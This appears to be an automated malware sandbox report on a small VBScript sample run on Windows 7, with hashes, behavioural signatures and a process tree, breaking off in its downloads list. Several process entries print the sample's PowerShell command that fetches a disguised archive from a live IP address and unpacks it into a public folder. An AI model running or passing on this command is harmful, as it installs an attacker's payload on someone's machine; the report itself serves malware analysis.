Analysis
-
max time kernel
350s -
max time network
705s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
12/03/2024, 14:32
Static task
static1
Behavioral task
behavioral1
Sample
g4.vbs
Resource
win7-20240220-en
General
-
Target
g4.vbs
-
Size
731B
-
MD5
f82736dcca9ccf1e8460707f48f51478
-
SHA1
2210fe31ae5e82413301a8e91bce03cf1eb14246
-
SHA256
e2228f06454d5c8033bb22ad4a81bbc3997e318bf34372a57232b51e8360f4d8
-
SHA512
67c5be560f30f2299f91288215924fb96db32a73a2beab988f7cb38a721984ee0f8f986f43b2780c3574ad81ffbeb98b3d4112e9982f3e4ec2e80fde27014c5f
Malware Config
Extracted
http://104.243.44.136:777/moh.jpg
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{73A541C1-E07D-11EE-9A4D-7A846B3196C4} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe -
Opens file in notepad (likely ransom note) 4 IoCs
pid Process 2900 Notepad.exe 1372 NOTEPAD.EXE 2672 notepad.exe 2852 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2920 powershell.exe 552 chrome.exe 552 chrome.exe 300 powershell.exe 552 chrome.exe 552 chrome.exe 2224 powershell.exe 320 powershell.exe 2636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2920 powershell.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe Token: SeShutdownPrivilege 552 chrome.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 1772 iexplore.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe 552 chrome.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1772 iexplore.exe 1772 iexplore.exe 2452 IEXPLORE.EXE 2452 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2860 wrote to memory of 2920 2860 WScript.exe 28 PID 2860 wrote to memory of 2920 2860 WScript.exe 28 PID 2860 wrote to memory of 2920 2860 WScript.exe 28 PID 1772 wrote to memory of 2452 1772 iexplore.exe 34 PID 1772 wrote to memory of 2452 1772 iexplore.exe 34 PID 1772 wrote to memory of 2452 1772 iexplore.exe 34 PID 1772 wrote to memory of 2452 1772 iexplore.exe 34 PID 552 wrote to memory of 1764 552 chrome.exe 40 PID 552 wrote to memory of 1764 552 chrome.exe 40 PID 552 wrote to memory of 1764 552 chrome.exe 40 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 1672 552 chrome.exe 42 PID 552 wrote to memory of 812 552 chrome.exe 43 PID 552 wrote to memory of 812 552 chrome.exe 43 PID 552 wrote to memory of 812 552 chrome.exe 43 PID 552 wrote to memory of 1540 552 chrome.exe 44 PID 552 wrote to memory of 1540 552 chrome.exe 44 PID 552 wrote to memory of 1540 552 chrome.exe 44 PID 552 wrote to memory of 1540 552 chrome.exe 44 PID 552 wrote to memory of 1540 552 chrome.exe 44 PID 552 wrote to memory of 1540 552 chrome.exe 44 PID 552 wrote to memory of 1540 552 chrome.exe 44 PID 552 wrote to memory of 1540 552 chrome.exe 44 PID 552 wrote to memory of 1540 552 chrome.exe 44 PID 552 wrote to memory of 1540 552 chrome.exe 44 PID 552 wrote to memory of 1540 552 chrome.exe 44 PID 552 wrote to memory of 1540 552 chrome.exe 44
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\g4.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2512
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://users/1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4dd9758,0x7fef4dd9768,0x7fef4dd97782⤵PID:1764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1176 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:22⤵PID:1672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:82⤵PID:812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:82⤵PID:1540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:12⤵PID:1460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2300 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:12⤵PID:1924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1284 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:22⤵PID:2756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1448 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:12⤵PID:2408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3700 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:82⤵PID:1912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3720 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:12⤵PID:816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3184 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:12⤵PID:2772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3752 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:12⤵PID:2876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3888 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:12⤵PID:2844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3396 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:12⤵PID:2312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1880 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:82⤵PID:1268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2508 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:12⤵PID:2600
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:2204
-
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
PID:300
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\a.txt1⤵
- Opens file in notepad (likely ransom note)
PID:1372
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\Admin\Desktop\a.ps1"1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2224
-
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
PID:320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\Desktop\a.ps12⤵
- Suspicious behavior: EnumeratesProcesses
PID:2636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass2⤵PID:912
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\Desktop\a.ps13⤵PID:2512
-
-
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Desktop\a.ps1"1⤵
- Opens file in notepad (likely ransom note)
PID:2672
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\aaa.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2852
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\aaa.vbs"1⤵PID:412
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"1⤵PID:2412
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force2⤵PID:2192
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"1⤵PID:2260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force2⤵PID:1424
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2104
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4fc1⤵PID:2692
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"1⤵PID:1932
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force2⤵PID:2392
-
-
C:\Windows\System32\CScript.exe"C:\Windows\System32\CScript.exe" "C:\Users\Admin\Desktop\a.vbs"1⤵PID:1976
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force2⤵PID:1672
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"1⤵PID:2192
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force2⤵PID:2884
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"1⤵PID:1808
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force2⤵PID:2700
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"1⤵PID:2020
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force2⤵PID:2620
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\aaa.vbs"1⤵PID:1620
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\a.vbs1⤵
- Opens file in notepad (likely ransom note)
PID:2900
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"1⤵PID:1752
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"1⤵PID:1872
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16B
MD5aefd77f47fb84fae5ea194496b44c67a
SHA1dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA2564166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
986B
MD50f4f741a30afcd13b686313d31ceaac3
